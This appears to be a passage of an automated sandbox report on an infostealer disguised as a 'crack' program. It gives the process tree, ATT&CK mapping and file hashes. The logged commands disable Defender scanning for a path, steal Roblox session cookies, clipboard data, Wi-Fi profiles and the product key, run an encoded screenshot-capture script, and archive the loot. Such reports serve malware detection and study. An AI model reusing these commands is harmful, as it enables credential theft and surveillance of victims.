      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1576
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\NL crack.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\NL crack.exe"
      4⤵
      Views/modifies file attributes
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1480
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3408
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3304
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1900
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1548
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4516
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4376
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3180
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t3rsw0zx\t3rsw0zx.cmdline"
        5⤵
        
        PID:1560
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp" "c:\Users\Admin\AppData\Local\Temp\t3rsw0zx\CSC62346B1B78744C99E3B47608584B852.TMP"
        6⤵
        
        PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1520
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1060
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1972
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3000
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2532
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4496
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1900
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1180
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4284
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4592
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48202\rar.exe a -r -hp"asd123" "C:\Users\Admin\AppData\Local\Temp\MVBln.zip" *"
    3⤵
    PID:3148
  - - C:\Users\Admin\AppData\Local\Temp\_MEI48202\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI48202\rar.exe a -r -hp"asd123" "C:\Users\Admin\AppData\Local\Temp\MVBln.zip" *
      4⤵
      Executes dropped EXE
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2264
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\NL crack.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2260
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2480

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1180

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4800

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3843055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e25058a5d8ac6b42d8c7c9883c598303

SHA1
bd9e6194a36a959772fc020f905244900ffc3d57

SHA256
9f6fe2203df58ba90b512b436fd74f5eeb4f39f4f9f54a41e882fc54e5f35d51

SHA512
0146f2d1298acf189005217784e952d6e99bf7c8bf24ae9e9af1a2ca3d881dca39f19f3ecd06c7d0ad919bc929edaf6e97e0ab2d7f71733b9422527c594ea0c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
042fe33d9ecc459eb4c443d810c84c2b

SHA1
d6d37a0e23d252ef840a94b01888d5b46680a16b

SHA256
b87a00d176619d0cde336383b3826a7a0709d168f84701ede753e08c61a62398

SHA512
0274c7ee8ae8ee6c3743f6ec3c7047f54c9fb190d0d92fde217f166dbaa7016b27104c04028bc388471b58b6405d676bafb18a2209c5f5742e59db1ed76fa04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp

Filesize
1KB

MD5
184a69fe793f550d512679c8e07cc6bb

SHA1
acc51a8590e7d37917401a9394ff48a09e02b569

SHA256
c590c54fd152dd0fbcf41360fe587c11e0be4cb884586d4cfd6164622fdd5045

SHA512
abd77d3d7fa1381cf2a0078c915205412c8e9c6452107d72bf96e1ceadcb71c10240459b4d6c3240d3976d3cb6a91b2cd2eb7d166b9fc6bba1e1137bbc937d83

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48202\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48202\_bz2.pyd

Filesize
48KB

MD5
